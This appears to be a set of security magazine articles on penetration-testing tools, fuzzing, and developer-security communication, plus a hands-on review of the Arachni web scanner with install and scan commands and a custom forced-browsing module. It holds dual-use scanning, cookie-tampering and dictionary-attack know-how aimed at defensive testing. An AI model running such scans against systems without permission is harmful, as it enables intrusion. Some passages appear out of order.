Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
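The core of such a tool is a TCP connect scan, which the sketch below reduces to a few lines. Real scanners layer UDP probing, timing control and OS fingerprinting on top of this; treat it as an illustration, not a production scanner:

```python
import socket

# Sketch: minimal TCP connect scan of a few ports on one host.
def scan(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected
                open_ports.append(port)
    return open_ports
```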
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide a means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most of the commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard or Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxy
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks for exercising the application's weaknesses and its associated components. For example, the penetration testers can view all cookies, hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application.
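Conceptually, the proxy's manipulation step looks like the sketch below, where the intercepted request is modeled as a plain header dictionary and the `role` cookie is a hypothetical target the application wrongly trusts:

```python
# Sketch: what an assessment proxy does conceptually - intercept a
# request and rewrite values the application assumed were untouched.
# The request model and the "role" cookie are hypothetical.
def tamper(request, cookie, new_value):
    """Rewrite one cookie in an intercepted request's Cookie header."""
    cookies = dict(
        pair.split("=", 1) for pair in request["Cookie"].split("; ")
    )
    cookies[cookie] = new_value
    request["Cookie"] = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return request
```

If the application grants privileges based on the rewritten value, the tester has demonstrated a trust-of-client-data flaw.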
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature for the test results.
• Extensibility – The tool can be customized, and it must provide scripting language or plug-in
capabilities that can be used to customize the penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that offers flexibility of use without specific constraints, such as a particular range of IP numbers or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g., submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – To avoid Cross Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from its own web form, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow some guidelines for hardening the web servers. Some of these guidelines are: maintain and update proper security patches, kill all the redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to implement strong passwords for the web applications' users and to clean up stored passwords.
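The advice on stored passwords can be sketched with salted PBKDF2 from the standard library, so that no password is ever kept in the clear. The iteration count here is illustrative, not a recommendation:

```python
import hashlib
import os

# Sketch: salted PBKDF2 instead of storing passwords in the clear.
# The round count is an illustrative assumption.
def hash_password(password, salt=None, rounds=100_000):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return salt, digest

def check_password(password, salt, digest, rounds=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds) == digest
```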
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system, where such a process determines whether there is a weakness or vulnerability in the system subjected to the assessment. Penetration testing includes the whole vulnerability assessment process, plus the exploitation of vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-force detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will, over time, continue to reduce both the uncertainty of determination (i.e., false positive results) and the potential to miss some issues (i.e., false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, the automated tools can't entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing alone cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as web applications grow in size, scope and complexity. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the reliance on automated tools rather than on humans manually testing these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of information technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix to the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you where testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing, and the user must also have control over the fuzzing parameters, such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria.
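A crude mutation fuzzer shows the random baseline that model-based suites improve on. This sketch simply flips one random byte of a valid sample per generated case; the sample request is a hypothetical stand-in for real protocol traffic:

```python
import random

# Sketch: a crude mutation fuzzer - flip one random byte in a valid
# sample input to generate anomalous test cases automatically.
def mutate(sample, n_cases=5, seed=0):
    rng = random.Random(seed)  # seeded for reproducible test cases
    cases = []
    for _ in range(n_cases):
        data = bytearray(sample)
        pos = rng.randrange(len(data))
        data[pos] ^= rng.randrange(1, 256)  # nonzero XOR always changes the byte
        cases.append(bytes(data))
    return cases
```

Model-based fuzzers replace the blind byte flip with anomalies placed at structurally meaningful positions in the protocol, which is where the coverage gains described above come from.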
Application Security members are considered like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign on the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security slowly is pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not open source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The effort requested is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: as the output of the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
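As a minimal sketch of the idea (hypothetical filter and expectations, written in plain Ruby here rather than as a full rspec/cucumber suite), a scenario modeling malformed input could look like this:

```ruby
require 'cgi'

# Hypothetical filter under test: HTML-encodes the characters abused in XSS
# payloads. In a real BDD setup this would live in the application, and the
# expectations below would live in an RSpec spec file.
def sanitize(value)
  CGI.escapeHTML(value.to_s)
end

# "Scenario: a malformed search term must not survive as executable markup"
malformed = "<script>alert(1)</script>"
filtered  = sanitize(malformed)

# The expectation reads like the remediation statement itself:
# the filtered value contains no raw tag delimiters.
fail "filter is broken" if filtered.include?("<") || filtered.include?(">")
```

When such a scenario fails, the developer sees exactly which behaviour to implement, instead of a generic implement a filtering policy remark.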
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so bug fixes are often prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
The security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem is, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. The methodology works when the programming language has a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java community, there are a lot of non-standardized frameworks available for Java developers
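The kind of protection those framework helpers inherit can be illustrated with a toy sketch (plain Ruby, not actual Rails code): user input is never concatenated into SQL text, it is bound into placeholders as an escaped literal.

```ruby
# Toy stand-in for a framework query helper. Real frameworks delegate this
# binding to the database driver; the point is only that values are treated
# as data, never as SQL text.
def bind_sql(template, *values)
  values.each do |v|
    literal  = "'" + v.to_s.gsub("'", "''") + "'"  # double any embedded quotes
    template = template.sub("?", literal)           # fill the next placeholder
  end
  template
end

# A classic injection payload stays inside a single string literal:
bind_sql("SELECT * FROM users WHERE name = ?", "x' OR '1'='1")
# => "SELECT * FROM users WHERE name = 'x'' OR ''1''=''1'"
```

Because the developer only ever writes `?` placeholders, the escaping happens once, inside the helper, instead of being re-implemented (or forgotten) at every call site.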
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke during a web application penetration test. He is interested in code review, and he is working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising the Tae kwon-do ITF martial art. He is a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about.me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction by the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1: Overview of audit and reconnaissance modules included with Arachni

Audit modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It gracefully handles badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules, both audit modules and reconnaissance (recon) modules; Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.

Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit.
• Form-based AutoLogin: performs an automated login.
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication.
• Profiler: performs taint analysis with benign inputs and response time analysis.
• Cookie collector: keeps track of cookies while establishing a timeline of the changes.
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine whether malicious inputs cause any behavioural changes.
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice: flags issues uncovered by timing attacks when the affected pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:

$ git pull
$ rake install

Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:

$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:

• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:

$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:

$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:

$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:

$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin, right-click ash.exe and choose run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How you fire up Arachni depends on whether you want to use the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands:

$ arachni_rpcd &
$ arachni_web

After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.

Figure 1: Edit Dispatchers
If you want to use the command-line interface instead, just execute:

$ arachni --help

A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues have been detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as e-mail addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and so on.
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  • Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher.
  • Tutorial: serves as an example.
  • Scheduler: schedules and runs scan jobs at a specific time.
• Log: overview of actions taken by the GUI.
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr

Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:

$ arachni --help

Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem in your assignment) and taking a lot more time to finish. List all modules with the following command:

$ arachni --lsmod

Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2: Start a scan screen
Listing 3: Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists generated from
# open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        # load the wordlist only once
        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file if !file.include?( '%' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name           => 'SVNDigger Dirs',
            :description    => %q{Finds directories based on wordlists
                created from open source repositories. The wordlist utilized
                by this module is vast and will add a considerable amount of
                time to the overall scan time.},
            :author         => 'Herman Stevens <herman.stevens@gmail.com>',
            :version        => '0.1',
            :references     => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets        => { 'Generic' => 'all' },
            :issue          => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check whether unauthorized interfaces are exposed
                    or confidential information is disclosed.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree and you will find the modules directory, containing two subdirectories: audit and recon. Move into the recon directory; we will create our Ruby module there.
Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name. For example, if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needs to be protected and you forget about it, it will be found by a scanner that uses these wordlists. Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
